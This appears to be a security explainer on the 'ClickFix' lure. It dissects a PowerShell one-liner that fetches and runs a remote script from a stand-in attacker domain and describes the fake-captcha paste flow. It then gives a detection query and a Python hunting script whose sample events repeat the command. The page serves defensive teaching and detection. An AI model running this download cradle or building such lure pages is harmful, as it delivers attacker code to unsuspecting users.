Clickfix IEX

Download and execute a PowerShell script from a remote URL via Invoke-Expression. The payload is fetched at runtime from the attacker-controlled domain.

This command runs on Windows
Example Command breakdown
powershell -c "iex (New-Object Net.WebClient).DownloadString('https://fix-support.icu/p')"

1. Invoke PowerShell

Runs PowerShell and passes the following string as a single command to execute.

powershell -c 

2. Invoke-Expression

iex (Invoke-Expression) executes whatever string is passed to it. The opening quote starts the command string.

"iex (

3. Create WebClient

Creates a .NET WebClient object used to perform HTTP requests.

New-Object Net.WebClient

4. Download from URL

Downloads the content at the URL as a string. The attacker hosts a PowerShell script; this fetches it.

).DownloadString('https://fix-support.icu/p')

5. Close and execute

Closes the command string. The downloaded script is passed to iex and executed.

"
How it works
The attack chain from victim execution to payload delivery
  1. Victim runs the command

    The powershell -c one-liner is presented on a fake “support” or “fix” page. The page copies the command to the clipboard, then prompts the victim to press Win+R, Ctrl+V, and Enter.

  2. HTTP download

    WebClient.DownloadString fetches the content from https://fix-support.icu/p. The URL hosts a PowerShell script.

  3. Execute

    iex (Invoke-Expression) executes the downloaded script. The script could launch calc.exe, run further downloads, or perform other actions.

Implications
Why this technique is effective and hard to defend against
  • One-liner. A single command is easy to paste and run. Low friction for the victim.
  • Seems legitimate. Victims are used to captchas and security checks. A fake reCAPTCHA-style prompt feels familiar and trustworthy.
  • Full script control. The attacker can host any PowerShell script. Change the file at the URL and the same command delivers a different payload.
  • Attacker-controlled at any time. Update the script on the server. No need to redistribute links or documents.
  • URL in command. Unlike DNS-based approaches, the domain is visible in the command. Blocklists and URL filtering can help defenders.
Interactive demo
Experience the clickfix flow: a fake security check prompts you to run the command via Win+R, Ctrl+V, Enter.
Note: The command is copied to your clipboard in the background when you click verify, with no prompt and no explicit user interaction. This is how real clickfix attacks work.
Hunting
Detection queries for IEX + WebClient download execution
DeviceProcessEvents
| where Timestamp > ago(7d)
| where ProcessCommandLine contains "iex"
  and ProcessCommandLine contains "DownloadString"
  and ProcessCommandLine contains "WebClient"
| project Timestamp, DeviceName, AccountName, ProcessCommandLine
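
The same hunting logic applied offline to constructed command lines, as an added example that is not part of the original page. It goes beyond the query above in two ways: it matches iex as a whole token or as the full cmdlet name Invoke-Expression, and it extracts the URL host so the domain can be reviewed for blocklisting. The function names and sample events are assumptions made for this illustration.

```python
import re
from urllib.parse import urlparse

# Alias or full cmdlet name as a whole token, case-insensitive.
IEX_RE = re.compile(r"(?<![\w-])(iex|invoke-expression)(?![\w-])", re.I)
# URL up to the closing quote, bracket or whitespace.
URL_RE = re.compile(r"https?://[^\s'\"()]+", re.I)


def analyze(command_line):
    """Return a finding dict for an IEX + WebClient download cradle, or None."""
    lowered = command_line.lower()
    if not IEX_RE.search(command_line):
        return None
    if "downloadstring" not in lowered or "webclient" not in lowered:
        return None
    hosts = {urlparse(u).hostname for u in URL_RE.findall(command_line)}
    return {"command_line": command_line, "hosts": sorted(h for h in hosts if h)}


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    # The command from this page.
    "powershell -c \"iex (New-Object Net.WebClient).DownloadString('https://fix-support.icu/p')\"",
    # Same cradle with the cmdlet name spelled out; the substring "iex" is absent.
    "powershell -c \"Invoke-Expression (New-Object Net.WebClient).DownloadString('https://fix-support.icu/p')\"",
    # Not this technique: "iex" only appears inside a file name, nothing is executed.
    "powershell -c \"(New-Object Net.WebClient).DownloadString('https://example.com/pixiex.txt')\"",
    # Unrelated administrative command.
    "powershell -c \"Get-ChildItem C:\\Users\"",
]


def hunt(events):
    """Run analyze() over command lines and keep only the findings."""
    return [f for f in (analyze(e) for e in events) if f]


def blocklist_candidates(findings):
    """Unique hosts seen in flagged command lines, for URL filtering review."""
    return sorted({h for f in findings for h in f["hosts"]})


if __name__ == "__main__":
    for finding in hunt(SAMPLE_EVENTS):
        print(finding["hosts"], finding["command_line"])
```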